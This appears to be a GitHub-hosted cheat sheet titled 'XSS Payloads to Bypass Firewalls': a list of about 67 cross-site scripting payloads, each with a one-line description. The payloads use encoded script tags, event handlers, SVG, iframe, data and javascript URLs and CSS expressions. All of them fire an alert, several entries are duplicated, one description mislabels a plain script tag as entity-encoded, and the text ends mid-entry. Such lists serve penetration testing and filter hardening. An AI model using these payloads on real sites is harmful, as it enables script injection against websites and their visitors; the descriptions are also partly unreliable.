-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathBypass-Firewalls
67 lines (66 loc) · 5.74 KB
/
Bypass-Firewalls
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
# XSS Payloads to Bypass Firewalls
`"><img src=x onerror=alert(1)>` : Basic payload using img onerror event.
`%3Cscript%3Ealert(1)%3C%2Fscript%3E` : URL-encoded script tag to bypass filters.
`<script>alert(1)</script>` : HTML entity encoded script tag.
`%253Cscript%253Ealert(1)%253C%252Fscript%253E` : Double URL-encoded script tag.
`"><svg/onload=alert(1)>` : SVG onload event to trigger alert.
`"><iframe src="javascript:alert(1)"></iframe>` : Iframe tag with JavaScript source.
`"><input type="text" value="<script>alert(1)</script>">` : Input field with embedded script tag.
`"><body onload=alert(1)>` : Body tag with onload event to execute alert.
`"><img src=x onerror="this.onerror=null;alert(1)">` : Image tag with self-nullifying onerror event.
`"><audio src=x onerror=alert(1)>` : Audio tag with onerror event.
`"><video src=x onerror=alert(1)>` : Video tag with onerror event.
`"><marquee onstart=alert(1)>` : Marquee tag with onstart event.
`"><object data="data:text/html,<script>alert(1)</script>"></object>` : Object tag with data URL.
`"><embed src="data:text/html,<script>alert(1)</script>">` : Embed tag with data URL.
`"><form action="javascript:alert(1)"><input type="submit"></form>` : Form tag with JavaScript action.
`"><link rel="stylesheet" href="javascript:alert(1)">` : Link tag with JavaScript href.
`"><svg><desc><![CDATA[</desc><script>alert(1)//]]></script>` : SVG tag with CDATA section.
`"><math><maction xlink:href="javascript:alert(1)">click</maction></math>` : MathML tag with xlink attribute.
`"><meta http-equiv="refresh" content="0;url=javascript:alert(1)">` : Meta tag with refresh attribute.
`"><input type="button" onclick=alert(1) value="Click me">` : Input button with onclick event.
`"><textarea onfocus=alert(1) autofocus>` : Textarea with onfocus event.
`"><select onfocus=alert(1) autofocus><option>1</option></select>` : Select element with onfocus event.
`"><svg><use xlink:href="javascript:alert(1)"></use></svg>` : SVG use tag with xlink attribute.
`"><div style="width: expression(alert(1));">` : Div tag with CSS expression.
`"><a href="javascript:alert(1)">Click me</a>` : Anchor tag with JavaScript href.
`"><input type="image" src="javascript:alert(1);">` : Input image with JavaScript src.
`"><form><button formaction="javascript:alert(1)">Submit</button></form>` : Form with button formaction.
`"><img src=x onerror="alert(String.fromCharCode(88,83,83))">` : Image tag with String.fromCharCode.
`"><iframe src="data:text/html,<script>alert(1)</script>"></iframe>` : Iframe with data URL.
`"><script>alert(1)//` : Script tag with single-line comment.
`"><svg/onmouseover=alert(1)>` : SVG tag with onmouseover event.
`"><div onclick=alert(1)>Click me</div>` : Div tag with onclick event.
`"><meta content="text/html; charset=UTF-7"><script>alert(1)</script>` : Meta tag with charset UTF-7.
`"><img src=x onmouseover=alert(1)>` : Image tag with onmouseover event.
`"><div style="background:url('javascript:alert(1)')">` : Div tag with JavaScript background URL.
`"><svg/onmouseenter=alert(1)>` : SVG tag with onmouseenter event.
`"><svg/onmouseleave=alert(1)>` : SVG tag with onmouseleave event.
`"><svg/onfocus=alert(1)>` : SVG tag with onfocus event.
`"><svg/onblur=alert(1)>` : SVG tag with onblur event.
`"><div id="x" style="width:100px;height:100px;" onclick="alert(1)">Click me</div>` : Div tag with onclick event.
`"><div style="background:url(javascript:alert(1));">` : Div tag with JavaScript background URL.
`"><div style="width: expression(alert(1));">` : Div tag with CSS expression.
`"><img src=x:alert(1) onerror=eval(src)>` : Image tag with eval in onerror.
`"><svg><use xlink:href="javascript:alert(1)"></use></svg>` : SVG use tag with xlink attribute.
`"><object data="data:text/html,<script>alert(1)</script>"></object>` : Object tag with data URL.
`"><embed src="data:text/html,<script>alert(1)</script>">` : Embed tag with data URL.
`"><input type="text" value='1 & onmouseover="alert(1)" autofocus>` : Input field with onmouseover event.
`"><img src=x onerror=alert(String.fromCharCode(88,83,83))>` : Image tag with String.fromCharCode.
`"><iframe src="data:text/html,<script>alert(1)</script>"></iframe>` : Iframe with data URL.
`"><script src="data:text/javascript,alert(1);"></script>` : Script tag with data URL.
`<svg/onload=alert(1)//` : SVG tag with onload event and comment.
`<img src=x onerror=alert('XSS')>` : Image tag with onerror event for XSS.
`"><script>document.write('<img src=x onerror=alert(1)>')</script>` : Script tag writing an image tag.
`"><script>document.body.innerHTML='<img src=x onerror=alert(1)>'</script>` : Script tag modifying the body HTML.
`<img src=x onerror="window.onerror=null;alert(1)">` : Image tag with self-nullifying onerror event.
`"><iframe srcdoc="<svg/onload=alert(1)>"></iframe>` : Iframe with srcdoc containing SVG onload.
`"><meta charset="x-user-defined"><script>alert(String.fromCharCode(88,83,83))</script>` : Meta tag with user-defined charset.
`"><svg xmlns:xlink="http://www.w3.org/1999/xlink"><script xlink:href="data:text/javascript,alert(1)"></script></svg>` : SVG tag with xlink and data URL.
`"><style>@import 'javascript:alert(1)';</style>` : Style tag importing JavaScript.
`"><meta http-equiv="refresh" content="0;url=data:text/html,<script>alert(1)</script>">` : Meta tag with refresh attribute and data URL.
`"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>` : Iframe with base64 encoded script.
`"><iframe src="data:text/html,<body onload=alert(1)></iframe>` : Iframe with body onload event.
`"><meta http-equiv="refresh" content="0;url=javascript:alert(1)">` : Meta tag with refresh attribute set to JavaScript.
`"><input type="button" onclick=alert(1) value="Click me">` : Input button with onclick event to trigger alert.
`"><textarea onfocus=alert(1) autofocus>` : Textarea